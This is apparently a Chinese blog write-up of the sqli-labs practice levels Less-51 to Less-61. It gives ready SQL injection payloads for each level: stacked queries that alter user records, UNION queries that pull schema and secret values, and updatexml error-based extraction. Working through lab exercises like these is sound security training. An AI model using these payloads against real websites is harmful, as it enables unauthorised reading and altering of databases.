当前位置: 首页 > news >正文

sqli-labs-master/Less-51~Less-61

news 2025/8/11 5:25:07

Less-51

这一关通过查看源代码可知,这一关是字符型以分号的方式闭合的。

那我们构造语句

?sort=1';update users set username='ZZKK' where id=1 -- 1

发现插入数据成功。

Less-52

这一关仍然是堆叠注入,闭合方式位数字型

?sort=1;update users set username='ZZKK' where id=1 -- 1

堆叠注入攻击成功。

Less-53

这一关还是老样子。堆叠注入。

?sort=1';update users set username='ZKK' where id=1 -- 1

注意堆叠注入原理,是利用数据库支持多条 SQL 语句同时执行(通过分号分隔)的特性,在正常语句后追加恶意 SQL 语句实现攻击。

你可以构造任何的语句来攻击。

Less-54

重这一关开始他对我们的查询次数做了限制,这一关他要求我们10次查询爆出字段信息。

注意这个表和数据生成后,都是随机的。参考的我下面的语法时要注意

先判断闭合,先试一下单引号。

?id=-1') union select 1,2,3 and 1=('1

发现回显点也正常。

那接下来我们直接爆库。

?id=-1' union select 1,database(),3 and 1='1

然后爆表

?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),3 and 1='1

爆字段

?id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='v35v8dtr7b'),3 and 1='1

爆字段信息

?id=-1' union select 1,(select secret_V535 from kv3lrjc74u),3 and 1='1

然后下面填入我们刚才爆出的密钥

完成。

Less-55

这一关,还是判断闭合,老套路。试了一下,把次数试没了,重置数据库。。。。

还是查看源代码吧。

?id=1) union select 1,2,3--%20

回显点正常。不错,下面就参考上一关的语法。

Less-56

判断闭合方式,次数试没了就重置数据库

?id=-1') union select 1,2,3 and 1=('1

有回显点,下面我就不演示了,参考上面

Less-57

接着试闭合,双引号闭合。换汤不换药,秒了

?id=-1" union select 1,2,3 and 1="1

Less-58

这一关就和上面不一样了,这里只有5次机会了,尝试了一下发现没有回显,但是有sql语句报错回显。所以我们使用报错注入。

先爆库

?id=1'and updatexml(0x7e,concat(1,database()),0x7e)-- %20

再爆表

?id=1'and updatexml(0x7e,concat(1,(select table_name from information_schema.tables where table_schema='challenges')),0x7e)--%20

然后爆字段

?id=1'and updatexml(0x7e,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='cb3groiezl')),0x7e)--%20

然后爆字段信息

?id=1'and updatexml(0x7e,concat(1,(select secret_N6EC from cb3groiezl)),0x7e)-- %20

然后将查出来的密钥,填入下面即可。

完成。

Less-59

和上一关一样。数字型。

?id=1 and updatexml(0x7e,concat(1,database()),0x7e)-- %20

然后下面的步骤和之前一样。

Less-60

这一关仍然一样。双引号括号闭合

?id=1") and updatexml(0x7e,concat(1,database()),0x7e)-- %20

Less-61

这一关闭合方式为单引号括号括号。

?id=1')) and updatexml(0x7e,concat(1,database()),0x7e)-- %20

步骤还是跟上面一样。

http://www.lryc.cn/news/615699.html

相关文章:

  • Lua语言变量、函数、运算符、循环
  • 【RocketMQ 生产者和消费者】- ConsumeMessageOrderlyService 顺序消费消息
  • 在windows安装colmap并在cmd调用
  • vue3前端项目cursor rule
  • 常用hook钩子函数
  • 海关 瑞数 失信企业 逆向 分析 后缀 rs
  • 从神经网络语言模型(NNLM)到Word2Vec:自然语言处理中的词向量学习
  • 【Html网页模板】炫酷科技风公司首页
  • Axure设计下的智慧社区数据可视化大屏:科技赋能社区管理
  • [0CTF 2016]piapiapia
  • PhotoDirector 安卓版:功能强大的照片编辑与美化应用
  • Dify集成 Echarts 实现智能数据报表集成与展示实战详解
  • 复杂项目即时通讯从android 5升级android x后遗症之解决 ANR: Input dispatching timed out 问题 -优雅草卓伊凡
  • 咪咕MGV3200-KLH_GK6323V100C_板号E503744_安卓9_短接强刷包-可救砖
  • WebAssembly技术详解:从浏览器到云原生的高性能革命
  • Flutter 与 Android NDK 集成实战:实现高性能原生功能
  • Vue3 组件化开发
  • Solana上Launchpad混战:新颖性应被重视
  • 一个“加锁无效“的诡异现象
  • BGP 笔记
  • Python 中的 Mixin
  • 第4章 程序段的反复执行2 while语句P128练习题(题及答案)
  • 【动态数据源】⭐️@DS注解实现项目中多数据源的配置
  • Datawhale AI夏令营第三期,多模态RAG方向 Task2
  • 深度学习入门Day8:生成模型革命——从GAN到扩散模型
  • pytorch llm 计算flops和参数量
  • Busybox编译、制作initramfs,并在QEMU中运行
  • 束搜索(Beam Search):原理、演进与挑战
  • Java -- 日期类-第一代-第二代-第三代日期
  • NLP:Transformer输出部分